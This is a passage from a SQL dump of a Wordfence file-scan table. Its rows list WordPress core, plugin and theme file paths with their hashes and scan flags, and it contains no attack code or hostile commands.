(0xb255eb6a0dfb9671b0db9b4be80cd014, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_tweetmeme.php', 0, 0x9a298d146f99db9c59fa1cb57155b569, 0x9a298d146f99db9c59fa1cb57155b569, 0x51dbdcfe1d3ef2238f87a794b2927d05aa814e45e4521161293238cdae6b8c62, '', 0, '?'),
(0xb25f66f4e7b21c3b77d061cbd9da81b1, 'wp-includes/js/tinymce/skins/wordpress/images/gallery.png', 1, 0x00000000000000000000000000000000, 0xa1065fb19f8c105077f9b4501055db34, 0x3c577e85eee1d8b60ba1c72bd1684e8c0ee98439e7d7fa31cc5fb033d5778b73, '', 0, '?'),
(0xb275e6d83c65e7789bae40d688c2883e, 'wp-includes/js/underscore.min.js', 1, 0x00000000000000000000000000000000, 0xdc95efbaca369dccfda71412431de555, 0x46aaedf3462ea650848b9f3820dcda5dbce5917b27973414b625d95b18ea3634, '', 0, '?'),
(0xb27d45615f4134c29325c5cc2932aacb, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_portrait_24px.svg', 0, 0x28aebc5dc1b5f02d47caee6ea8b30d2f, 0x28aebc5dc1b5f02d47caee6ea8b30d2f, 0x2c00e7d26eba364565493938cc81613afd34f50e733c0993833f0adc02e8bfd4, '', 0, '?'),
(0xb27e3b6fee8be93a12fcddf4a409c28a, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_info_list.php', 0, 0xfbdcf01223a7e70d4536b01f3bde0123, 0xfbdcf01223a7e70d4536b01f3bde0123, 0x649c7eb73c7b13ae157ebd09e0e1616250df44dc149c3335795d6623e464f8ab, '', 0, '?'),
(0xb289b95d2954939c8297c04e323546d5, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php', 1, 0x00000000000000000000000000000000, 0x0c16475216cb97056385eda43f7174e7, 0xd69d527a35151d42c42cb3b46ec9b2bfa0feb78c0a0f486fdaa81406d0f2bd7c, '', 0, '?'),
(0xb28b713f25cdf57270fef830f737ef71, 'wp-admin/css/colors/coffee/colors-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xbd4405a8496e1b998699be2712184241, 0x083ecd482dc3951ae569d3317a6be60582baf1a0295f563615b301280d7eff3a, '', 0, '?'),
(0xb2a0aaac4fa3f28cd51c0d907e51c0d3, 'wp-content/plugins/js_composer/include/params/vc_link/vc_link.php', 0, 0x054b1e8e44bd3df47e752759a24856db, 0x054b1e8e44bd3df47e752759a24856db, 0xc17efc0d77ef1aa49b1ecff4a839cae6e97a000c757878f8445d6d1ba18c6b14, '', 0, '?'),
(0xb2b31503c07f1b9ac13ba174696f07ce, 'wp-content/plugins/js_composer/include/autoload/vc-pages/welcome-screen.php', 0, 0x6b1b920d50113d986772ef5be6f0e004, 0x6b1b920d50113d986772ef5be6f0e004, 0x93e567f5510d4af1a314671cd8c23eeb3332df29a3259a0defb1b72fd93cec18, '', 0, '?'),
(0xb2b4d96d80d096283abc830adeeabc1c, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design02.php', 0, 0x1c9695853daa2a45fcae2ae3fe0c2939, 0x1c9695853daa2a45fcae2ae3fe0c2939, 0xacc55c803caa98f11967df11aa61db5fbb9bb6db7ea4fa522e8f42bbb74327c4, '', 0, '?'),
(0xb2ba2d5bf58e888c53d15fd8b951f0f8, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php', 1, 0x00000000000000000000000000000000, 0x16313ab0d82195477e1ba071e7696313, 0x5eeb4443671c755054213ebbfe9bf457b8c51abbc71caf6bdd7e1b5f350c0a38, '', 0, '?'),
(0xb2d71f81c72b0176bfa717cec3c962e8, 'wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/owl.carousel.min.js', 0, 0xfc20ccaad0cf5ce51d7b7a1b66589cd3, 0xfc20ccaad0cf5ce51d7b7a1b66589cd3, 0x68a7c5aa97b3a4e9dd9994ae3b8cd0f70a96729d966f8c701c09b696c4780016, '', 0, '?'),
(0xb2f97a766f3af8b7dc1442259abaf0f5, 'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php', 1, 0x00000000000000000000000000000000, 0x9ee0deddbb31b2e9f628776d46f2dfc2, 0x84b5e392dc42aedfdc36ebc6d53bbfb54de4d4e5039538b4a01a83bee5260114, '', 0, '?'),
(0xb2fffead78c47fd099d229444387cc3c, 'wp-includes/js/customize-models.js', 1, 0x00000000000000000000000000000000, 0xedc8e3858fdd8365e03b244c9d368f37, 0x8340412aaa9ccaa4db4a9b03c22cd063a9141257358d9127357dca690d90b040, '', 0, '?'),
(0xb30c7ea39ab9ad55f722d0269018d005, 'wp-includes/images/wpicons-2x.png', 1, 0x00000000000000000000000000000000, 0xc3e76ed756c4056fa9249a944f667e37, 0xdd5ddaa9413d0fb5d1920ebf1225ce7102a225614dc1c089f9e04206ad55e670, '', 0, '?'),
(0xb318cc57327fddd84481f14787378756, 'wp-admin/css/common-rtl.css', 1, 0x00000000000000000000000000000000, 0xa4490a668e75cdfaa5d0155a15c2d785, 0xaa9431b572e58153e53cd337de4df59161df58f4f2de5d9abee7948c7abeca22, '', 0, '?'),
(0xb31ce84d0c139fe97e0acf547c020eb7, 'wp-includes/js/mediaelement/wp-mediaelement.min.css', 1, 0x00000000000000000000000000000000, 0xea958276b7de454bd3c2873f0dc47e5f, 0x213fff5bf6dc5ffcc5e772f480e13d260ec80af62d257f211479b8071ba30dda, '', 0, '?'),
(0xb32e944fb2a20d96721f62f993d6f645, 'wp-content/themes/Impreza/framework/plugins-support/bbpress.php', 0, 0xbba61007bc750ec74ebf3d043952cb07, 0xbba61007bc750ec74ebf3d043952cb07, 0x7e10ae2f8bb8a6316357c1b56dba9c6218fbfe1a6ae466bf5c61ba8234b9c5a9, '', 0, '?'),
(0xb335b1d262702729cd33fdf48e3ff556, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_movie_24px.svg', 0, 0x967c3ea5f614c6046501643abbcdd855, 0x967c3ea5f614c6046501643abbcdd855, 0x9cec58dc63cc1aaa1999338bf88de3562e0fbd184d28ad94c4e539724cbe9469, '', 0, '?'),
(0xb35662286b74885722ed36283bc6b4a0, 'wp-admin/includes/class-wp-media-list-table.php', 1, 0x00000000000000000000000000000000, 0xc925a897e4b773c8f8ed8f04ba48d0a9, 0x0df72c8c77085a690809c88773e1fb55fc3ce13bed24218b8d5a5e9e578a34c2, '', 0, '?'),
(0xb363e01ff0b52be627f371f7c9904a33, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_loop_24px.svg', 0, 0xb987a172078e2f322526f9c22e1ed056, 0xb987a172078e2f322526f9c22e1ed056, 0x6829a075e2ac89217bd2478d0017c407008fc500c9cc7887865923694456f097, '', 0, '?'),
(0xb374664609d6727b99dc87a05f49b278, 'wp-includes/SimplePie/Parser.php', 1, 0x00000000000000000000000000000000, 0x52bb2ee462e7e414a77efdc7ebf52bcc, 0xd74ae432f9323c638cde0838657a644ba7db5ec4917219e83c547b15f423ca77, '', 0, '?'),
(0xb3764750580b0770b26d52c2171216cb, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-finance.svg', 0, 0xd77d0c062b571258df51e5d5008fc154, 0xd77d0c062b571258df51e5d5008fc154, 0x225a3862033aeffc14637ed8a6ed0ed44a30f663a799e3c9b6bddfc96f1c5f52, '', 0, '?'),
(0xb37c5da744c5f31a2e92451c06eeb1ae, 'wp-content/plugins/wordfence/views/scanner/scan-progress-element.php', 1, 0x00000000000000000000000000000000, 0x03cd1e4af98ec52125498b57e062179c, 0x74b177cd80a27e89730c671c0a13af062bf6417dbac062074c82acd34edc75b8, '', 0, '?'),
(0xb382ef9604e7e7387c38138178b030c7, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_pin_24px.svg', 0, 0x1bd964cb29cbc19a74928a6ee064da49, 0x1bd964cb29cbc19a74928a6ee064da49, 0xd247337fff08dc20adbcb755f282ab74a301b149d86e5ff43318f88fad36e450, '', 0, '?'),
(0xb395130303d2d1e70ed50bbdda783fec, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_hide_24px.svg', 0, 0x87e832124d6f5e8f185974035c27c84e, 0x87e832124d6f5e8f185974035c27c84e, 0x18789ce958c35fc3e1cdf863b97e928ceb47ea2407ca6107e6838992f002fcfd, '', 0, '?'),
(0xb3b12808d389c9da44d210626626f9ba, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-facebook.php', 0, 0x7907b6f5bc779ebef75745d60c7018fd, 0x7907b6f5bc779ebef75745d60c7018fd, 0xf32a4ccee611b77a4b3a853a2ad28ea0835b1c1c27be828af84a5f4d9bc1476e, '', 0, '?'),
(0xb3b1b535c72b7d8a100c3b81fc26c21c, 'wp-content/plugins/revslider/includes/slide.class.php', 0, 0xe47c3c2a67f429b7d2f579b7a4ceeb7a, 0xe47c3c2a67f429b7d2f579b7a4ceeb7a, 0x4e0fe36e6b57b4abaf617dc6aa0d95fe7e68f77e9209d87be8f737118f13cac2, '', 0, '?'),
(0xb3b3cc2325726f483653fd4d84439682, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/index.php', 0, 0x0ed0fa48123e9753f60a51dc5534a8be, 0x0ed0fa48123e9753f60a51dc5534a8be, 0x4ccb304a2d238a28edc684aa33d7e57db82c36f95eaa53e0b5a7453cbb29803c, '', 0, '?'),
(0xb3b86c7bf26f31a35fe93830a4a5a4b1, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_backspace_24px.svg', 0, 0x57e6efbea1fb518e9d3d7b61eb01baed, 0x57e6efbea1fb518e9d3d7b61eb01baed, 0xb5a0032e9f11ef10d2c5a59fc687c3a299b307bf783862d19b9a8ec9d3aab14d, '', 0, '?'),
(0xb3c06e0df96225bcbee96071ea052188, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-accordion.php', 0, 0x7070d3fc771ead619cd939ff6594607d, 0x7070d3fc771ead619cd939ff6594607d, 0x26236608c6a236a57ba389f4c3622825f2a6360d57c8c634b3a3c1bc3b566784, '', 0, '?'),
(0xb3cdca23ef587d3d388d470b66c2c6a9, 'wp-content/plugins/revslider/admin/assets/images/slidersources/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xb3d798221dbf16d493aa2554eee36276, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_today_24px.svg', 0, 0xa49a89d2b1af90103d04ee2546869ab5, 0xa49a89d2b1af90103d04ee2546869ab5, 0xb8299338b271ba1cf05435b8bfd76cac665c4dafa3558f38909df694849f7d3b, '', 0, '?'),
(0xb3fa7353c9f6332378cd35a2b16478e4, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_link.php', 0, 0xf651b2f48b1f07c237dd538b3ccbb71e, 0xf651b2f48b1f07c237dd538b3ccbb71e, 0xf433faf5e18d9ba5e18f5e9f2a135ecb41e1b985b6fca1a86e5a8d0486a7ff13, '', 0, '?'),
(0xb40bb5dfb23bf89b3011ff82d9cb0b0b, 'wp-includes/feed-rss2-comments.php', 1, 0x00000000000000000000000000000000, 0x7580609bd9e4a5cfdf859161f1d3b43f, 0x8ce4d088479506d22de6ad702226e1a2cb2e7b02cedd284ba9356c9563e3324d, '', 0, '?'),
(0xb413a1f6e6a588293c362e1a28866f43, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design03.php', 0, 0xbb8816eba9abd77afc1a5dbb7521f409, 0xbb8816eba9abd77afc1a5dbb7521f409, 0x4da34d988cb538f6762f14fa15b8109e2cc47f33b2f77e5e27c1056ad93de286, '', 0, '?'),
(0xb41e7854290b9ce93e50ba56215361d5, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_stars_24px.svg', 0, 0x835262760e4d9ea1df019295032942dd, 0x835262760e4d9ea1df019295032942dd, 0x03090a07969a315bc78e436834f144a9d784109e2ef3cef01e64043f553abbe9, '', 0, '?'),
(0xb425b751700ad76982ceccae23b2ed26, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_lock_24px.svg', 0, 0x58c7df0f10025f4b6174255baf3d5f5a, 0x58c7df0f10025f4b6174255baf3d5f5a, 0x53a1826b8c2d07f37197ab0836cfd0bf5203b6aea8a3652b97c36e9a4926e4e7, '', 0, '?'),
(0xb42b1f024cb248a25597e335048d44e6, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/modal.min.js', 0, 0x30358ff8654c16540ac2cf6d1f122da1, 0x30358ff8654c16540ac2cf6d1f122da1, 0xaae648898d1cc5ccb18ce4b8fd595b207ae4e6ce011fad95895e97648d5c1e5f, '', 0, '?'),
(0xb42c51a81b2202e6d574e13788036eea, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_links.php', 0, 0x424415d49d0ba220bfe55c9f0259b3ef, 0x424415d49d0ba220bfe55c9f0259b3ef, 0x6c3030721e973ac84f569fe538b76a11f4d20c6cb888f4812884e5aea568bf1d, '', 0, '?'),
(0xb4369a6724e520338b596476f140c207, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_nfc_24px.svg', 0, 0x2567b4ba3a5a428ac0770437155650da, 0x2567b4ba3a5a428ac0770437155650da, 0x253f0324c55e20e875d5a659e500406ba3e8f5eb578f8b3ba6d8d1d5fb9e2e2a, '', 0, '?'),
(0xb43cd8ec8067e33db143a314d7b47144, 'wp-includes/customize/class-wp-customize-themes-panel.php', 1, 0x00000000000000000000000000000000, 0xeefb755a08a9949437d1b3929c8ba855, 0x614d6be1bc1edb034d062ee9dd9a84664a3ebdf694cc7ba556f692c13e763255, '', 0, '?'),
(0xb43d5ba6ec610469557cf1798db3c2b6, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_textsms_24px.svg', 0, 0xeaaf52be351fa5c5fd21362f21a8b62b, 0xeaaf52be351fa5c5fd21362f21a8b62b, 0x5c738b0a6df93b7b04817328aac7ccdddac40a8c43892845b038fea09c272b0a, '', 0, '?'),
(0xb450433cc2c2091bbacedb766ee05238, 'wp-content/plugins/wordfence/images/tools.svg', 1, 0x00000000000000000000000000000000, 0x871ef28140631549dc181118dbcbe1c5, 0xdcea5984e63ddce905e10bbeeeee52428f2915097ef2ebd70cef82dc96dd9f72, '', 0, '?'),
(0xb4519181e0e223a20bc0fdef16551397, 'wp-content/plugins/js_composer/assets/lib/bower/lessjs/dist/less.min.js', 0, 0x5861832330ffafcbb84d91725d799fea, 0x5861832330ffafcbb84d91725d799fea, 0x021419ada212059fa23e3aaaa5b8fde6f070c908eef90b3dba73dc868865361c, '', 0, '?'),
(0xb454913bc869265b395df2c4695582d7, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/tabs.js', 0, 0xbb6e1e878cb923aed179822f2a34746c, 0xbb6e1e878cb923aed179822f2a34746c, 0x772bbed8f8479ca7020571802a8e2c9ed03190f4a7875e5af81abc7c7438b0b7, '', 0, '?'),
(0xb459ce3240a472a3a8f4cf19581a1091, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_front_24px.svg', 0, 0x5afe4b93147dbc9e0231dbc867876394, 0x5afe4b93147dbc9e0231dbc867876394, 0x2b2365a8a80444efb0096392bb570a9c0fe5a304d5e36f01956dbc96c4a786f9, '', 0, '?'),
(0xb469f6c763d760dd2a15e54c81a0b6be, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_24px.svg', 0, 0xcfcef8bcf2de273438963b3b7138b840, 0xcfcef8bcf2de273438963b3b7138b840, 0x7f558b09beef1ce5b1f82222d8ba8da948b28bd11fb12d09b84aa73df204b370, '', 0, '?'),
(0xb482192c1006e906d74d86f83b76fbfb, 'wp-content/plugins/wordfence/views/dashboard/options-group-import.php', 1, 0x00000000000000000000000000000000, 0x3d53c9306ceea94ba8bd405ecbf83d0e, 0x88e706dae40eb8cf85fbba943ce3e8550f52bd59a812400ee6b72aabe31d6373, '', 0, '?'),
(0xb48333a0542e5e9dc6993cde0ff7f814, 'wp-mail.php', 1, 0x00000000000000000000000000000000, 0x900dc6b4efa96d1177c2d3471dce35e6, 0x841c49df964b8c8db4f990689efe3f7512babb6d860b46852aabd48c97c94de7, '', 0, '?'),
(0xb49527888b405320c7f744e192149aa0, 'wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php', 1, 0x00000000000000000000000000000000, 0x8296b0fe8efca7f25c506d40e18d6e99, 0x3404c481cfd705ea954c8f7386c8164603efe6bd136d1a5ed31a44a451158f9e, '', 0, '?'),
(0xb4a046c11bcb12e8edae39b1341a60ae, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-masonry-grid.php', 0, 0xfd3e301faee1ed71cad229715161ca36, 0xfd3e301faee1ed71cad229715161ca36, 0x6eea9571166c8f4c67f61ae4ef7221d63b6c6fec85ceebc5af99f2828f7a5dc1, '', 0, '?'),
(0xb4acb4f726e30ae08b58f0ebb64cf5f2, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_24px.svg', 0, 0x69baa1af378808f4246ffa7d7c4e982e, 0x69baa1af378808f4246ffa7d7c4e982e, 0x51ac8c5ef86e14e4f8e4128bc9121c7566c7990bb8d17c630a2fbd777be68168, '', 0, '?'),
(0xb4b8a727d6f11a79a60a877e7026c246, 'wp-content/plugins/wordfence/css/diff.1579191227.css', 1, 0x00000000000000000000000000000000, 0xdc806709adfa09992492988b6072f351, 0xc0dc161d24b518cc68454a5e35343c249e02d3ad115963c312d7e1c2921bde26, '', 0, '?'),
(0xb4d24bb4e7e74f05c89639d7337c3c8d, 'wp-admin/maint/repair.php', 1, 0x00000000000000000000000000000000, 0x81838549ea8edae6e4a4b8d6c5a719d8, 0xd88b3b79ed6e628c2dcf74f6527983310e804502b339bedcb87530be3dc62c68, '', 0, '?'),
(0xb4f049c7e5d8fb2e2455305d2788535f, 'wp-admin/includes/widgets.php', 1, 0x00000000000000000000000000000000, 0x86b47480c04a5923ca3f41b3999203b9, 0x271d219e0b9939c073d881fdd85197abdacf34f46cf8b8fe35e6f8dd8f1f8738, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0xb50996730e4df743fc9f74b2a86f0008, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart05.svg', 0, 0xdd36b9e4bee115efc485d0c303e91d73, 0xdd36b9e4bee115efc485d0c303e91d73, 0x95ecec5e2fafb98b0f505544f51b5cdf20a4d876eb2f8e8eeb456336afbea7fe, '', 0, '?'),
(0xb50ed455c0e8a69faf3863d8e597602b, 'wp-content/themes/Impreza/framework/shortcodes/us_social_links.php', 0, 0xc9e56826afff1077d645fd0df7851c65, 0xc9e56826afff1077d645fd0df7851c65, 0x6ce34b1d969a7bb564894c87ff438c038909c552ff6b5404fbb1a7978fc8ede9, '', 0, '?'),
(0xb513e5b5152b449e46dcbf545a5b4837, 'wp-admin/images/post-formats-vs.png', 1, 0x00000000000000000000000000000000, 0xa68f53a66c93f4485ca9acafaffc81e6, 0x18658574af81ab777c57a77b0e1278bf79250c4b3aa6bb514537ac9091e5c3d3, '', 0, '?'),
(0xb51c8a170b412d01571d3a7a0f837416, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_loupe_24px.svg', 0, 0x8c74df3588c4812b105423c571ab43f9, 0x8c74df3588c4812b105423c571ab43f9, 0x419f8477936135c5ed8b592a494c7bff16f638ad85e4eb2952122d6f09a16b8f, '', 0, '?'),
(0xb53416a2f5663917332ed79b038cc03f, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gallery.php', 0, 0x1206a651649917e1aeabcc0f75e3c9f5, 0x1206a651649917e1aeabcc0f75e3c9f5, 0x80628827d97c19c22f506ace94ec1a6b5d524442da192f5904b3c6e3bfeccbcd, '', 0, '?'),
(0xb53c9f331e7fec86761ba27f128f2646, 'wp-content/plugins/wordfence/views/scanner/scan-failed.php', 1, 0x00000000000000000000000000000000, 0xa1e7ad45e8dbbb05303472b6f61ef7a5, 0x483f938aac03a24dda714b2d346c5f3cfb2a3ddc80edebb4c58870162beeddc9, '', 0, '?'),
(0xb54110a9abdafbe91feee31b7da8b2c9, 'wp-content/plugins/revslider/includes/operations.class.php', 0, 0x0f7ea7ade5eae02fbd814aae51a3a846, 0x0f7ea7ade5eae02fbd814aae51a3a846, 0xcb421584f871151081cc32eaa5ad24931a8f58c86d8b4ff91e68e1de45794755, '', 0, '?'),
(0xb5413fe0995d5c38ab504d54c90f6c05, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php', 1, 0x00000000000000000000000000000000, 0x16bfd043c542da29638ee061658392c7, 0xdf5b7d93beb144d8d5d4004f56b13a7e2dd41d227e6d421568223cc4f97057e8, '', 0, '?'),
(0xb547565c7ab28523b0ff83213ba2c40f, 'wp-includes/js/media-audiovideo.min.js', 1, 0x00000000000000000000000000000000, 0x2c17fb7873f73e7f6a19d201a35cb9ae, 0x763314e6018ab3690053636afa702b1fd8557419ef20109870687ce4572358f7, '', 0, '?'),
(0xb54bf158d3e0ca18e2dd0a0efdad3efa, 'wp-content/plugins/revslider/admin/views/templates/sliders-list.php', 0, 0xb276c74ac7b51babbe911b98b7f79770, 0xb276c74ac7b51babbe911b98b7f79770, 0x3ebea05e67ec45b0ea608549df51f266de822feacf25783a100bf427abe80cd1, '', 0, '?'),
(0xb54d9fe973e13b272c10bcdeda2d457f, 'wp-admin/css/dashboard-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x34aaa2e3bb0ea2c12c57fb7ab40a3b70, 0x8952d41003ae40b82cc1882f6655821b73b0b4edb5638d0a2a618041093f733b, '', 0, '?'),
(0xb54f97721023bdd4fd54ba478717bf21, 'wp-includes/js/swfobject.js', 1, 0x00000000000000000000000000000000, 0x9ffdba2cff497d701684657e329871f5, 0x3f94904c77829ecf2ee70f344d8deed5924685024ad2f83e664986e9b486059c, '', 0, '?'),
(0xb5505bc66ac9793f592b016c49c2a0bc, 'wp-content/plugins/Ultimate_VC_Addons/admin/js/jquery-colorpicker.js', 0, 0xb833ef5e0dbfa1aadffe0bb4242f8592, 0xb833ef5e0dbfa1aadffe0bb4242f8592, 0x32622f23187fbaff4c860899877ac95fb8eefea46c6b532989fb50d0ad7ca385, '', 0, '?'),
(0xb564979ce09bf0b2f7e4f881819233be, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_album_24px.svg', 0, 0xd4230c04c2530080cc362df68d34078e, 0xd4230c04c2530080cc362df68d34078e, 0x4fe63e35634966dc8e89b614e90bffdcce7347ee6c38f57a5b3407dec7f901ff, '', 0, '?'),
(0xb56c260108f62a87a91cf5f1dff5c826, 'wp-includes/SimplePie/Content/Type/Sniffer.php', 1, 0x00000000000000000000000000000000, 0x7c72c3f369855562d96c77ece1c7db33, 0x36112522ef5c5c34da4e81ca2a46b0b4e18a1c60d9071110ce93e50d4c2a3dc7, '', 0, '?'),
(0xb5810dcae64d5ddd29d3093525e81b08, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-article.svg', 0, 0x98ca726b5c61ca4b0b7fadeee18ffee8, 0x98ca726b5c61ca4b0b7fadeee18ffee8, 0x09903dd1cd231cc4be0c0be946a4ae0c42626630537a96d963d967c6c775559e, '', 0, '?'),
(0xb586bb2428ad678b28c1aed450dae72f, 'wp-admin/css/wp-admin-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x47835135274559ad6fe230b67dc65fc7, 0x30877c5446eee1cedd4f201b09ea2e97ab91e5a8e32eb9af3e81b943456afbf8, '', 0, '?'),
(0xb58df8a70584a1c96b4dd4d53fca7558, 'wp-admin/css/ie-rtl.css', 1, 0x00000000000000000000000000000000, 0x55a791469c9bc1886f4272fd3c6ddf27, 0xd094876c570c68913c53a73de5aa5cf9223001a080694399444dd2de711aaf17, '', 0, '?'),
(0xb591d7a1a98f5593763e41e79c70b550, 'wp-content/plugins/js_composer/include/classes/settings/automapper/automapper.php', 0, 0xe117fc57be7e1c9b861f1bf310400d11, 0xe117fc57be7e1c9b861f1bf310400d11, 0xe3c8fd7461034f13b8758c3a801b043675598ae89621989d512bd28316a5b27e, '', 0, '?'),
(0xb5983dcb599a4fae8f146f4fcd328bb9, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-js.php', 0, 0xf07f0049df4aa2ef55d207034b3b35bb, 0xf07f0049df4aa2ef55d207034b3b35bb, 0xcf402fc2cbda32dd5efe638f8030e5d77b71dfaaf55d4742e69912c0aaa7fbfe, '', 0, '?'),
(0xb599e7e9f5f7cbfdf811ce106e4485a2, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-cta.svg', 0, 0xfd98ec59fbd46b564bb4e6e1298a3cbd, 0xfd98ec59fbd46b564bb4e6e1298a3cbd, 0x8e513de7e419cfea8af841ab37fc1699b324834e33667607e4d9168268f7ea45, '', 0, '?'),
(0xb59c359d8e4174df82966d30698e7aae, 'wp-admin/css/themes-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x546c91b261d6c87cb01db2444d599cad, 0xef07d2868191992cf0286bbeeb1c2a058b62be21a10bdd325fcc46c7d20a76a8, '', 0, '?'),
(0xb5b1e3b70b0771864bd11955d46aeda4, 'wp-includes/SimplePie/Category.php', 1, 0x00000000000000000000000000000000, 0xba7ec8cc3f13d4f27f2e0adcaf64bb2a, 0x133bf6b3d0b594993da753c34064637f1b5d7252d6bc6e98dc20d73c1da1cd36, '', 0, '?'),
(0xb5c14fc2ad0a098455c9eda097526212, 'wp-includes/Requests/Exception/HTTP/304.php', 1, 0x00000000000000000000000000000000, 0xd33b4634ce4113db49ef9dddedf754ab, 0x76a6d3439d90870961ce2746de3b80f81ef2b17ada08bb94281b654aed03b14c, '', 0, '?'),
(0xb5c49379bbc9b975cb92585ad576ede1, 'wp-content/plugins/js_composer/assets/vc/logo/wpb-logo.svg', 0, 0x3ecff203a19f382a25584ae6ca55d0b0, 0x3ecff203a19f382a25584ae6ca55d0b0, 0x8822e93e233ca4a126e9aa126e9c91d3d5ffafb349877416e2561df8fce136f7, '', 0, '?'),
(0xb5dd69b2f715d5b3344a1b5e75f5829f, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_row_inner.php', 0, 0x81e7a1f9b62e073917775694fb8598c1, 0x81e7a1f9b62e073917775694fb8598c1, 0x3496c6b3d19fa995d2e815556833b6f9c4d7a2b2339f8ba1f856a6f8baad6cad, '', 0, '?'),
(0xb5e31b2d5a08bcb38011023a45be3a1d, 'wp-admin/js/image-edit.min.js', 1, 0x00000000000000000000000000000000, 0x56db71c85951d868ec1242aaec00c37a, 0x351eac106fa4c0bafb89ff91dd3081966bf9a0b546df954de19468634e074b3b, '', 0, '?'),
(0xb618c22df422e9bdf075a7b6bbc23552, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_plus_2_24px.svg', 0, 0xa627763af74c32b9f85f52657947131a, 0xa627763af74c32b9f85f52657947131a, 0x52d17b2b9d69a4f62e7ed2ce9d962ec82a327ef96a1068bc38c4ba7e9a73a3d7, '', 0, '?'),
(0xb61b7daa217ea8c67b735f599f5e7930, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_clear_24px.svg', 0, 0xbe5bccee7c412ebefd11c72de0deae62, 0xbe5bccee7c412ebefd11c72de0deae62, 0x4dde643b5d3cfbccceee2623524b7c3da43b2dd996a46863e46ec117e75c22aa, '', 0, '?'),
(0xb61dbaa47c8f6a5896f9a9df7cea6662, 'wp-admin/css/login.css', 1, 0x00000000000000000000000000000000, 0x74eeb188296b161860ba9dbc08f57c54, 0x3d222b998ae9bb45d284f1a82a513f986cfe83ed170b5368d410f751991d3e19, '', 0, '?'),
(0xb62dc89ce6228072d32ea2a82b12307c, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_36px.svg', 0, 0xa5ef19e83b3fc162e058c6bf5cdae5af, 0xa5ef19e83b3fc162e058c6bf5cdae5af, 0x3343f1a1024a3b435d512bfe466eb9670e90bb11c60743ca9d1fa782a974e3e4, '', 0, '?'),
(0xb64212bd672a5ebd01d01dbd8935d439, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-posts.php', 0, 0x9f97424eaeca820815c6f04fb5621310, 0x9f97424eaeca820815c6f04fb5621310, 0xd8b3b1e7ff410183a5312c3f8980410a37823c529e13ce17be8b04951aa1dbbd, '', 0, '?'),
(0xb64d52b2e66cc442109c07151146a575, 'wp-includes/option.php', 1, 0x00000000000000000000000000000000, 0xfaef16019af288f252fa4ecc7280f913, 0xa8269c0104f685327ffca961673ed3a15c4917ff26e395eb16bd26d3d103f8bb, '', 0, '?'),
(0xb656c6646a0d24a54e64748d46938aa8, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/monitor.svg', 0, 0x5024d4175324bf3b992eed63a9e01389, 0x5024d4175324bf3b992eed63a9e01389, 0x0da8fef1db8285d38b7434425c3f38980ca34dea265b3cdad68641f5eaa3910f, '', 0, '?'),
(0xb660859db90c328dc8180a1bc4c53493, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/dual-button.js', 0, 0x82b422396ea8e904a6bab380b5be3f88, 0x82b422396ea8e904a6bab380b5be3f88, 0x71b65bbfd257db73285808f6cc6bf7a64efe0d3640b0e30fc61fe6479141ed1e, '', 0, '?'),
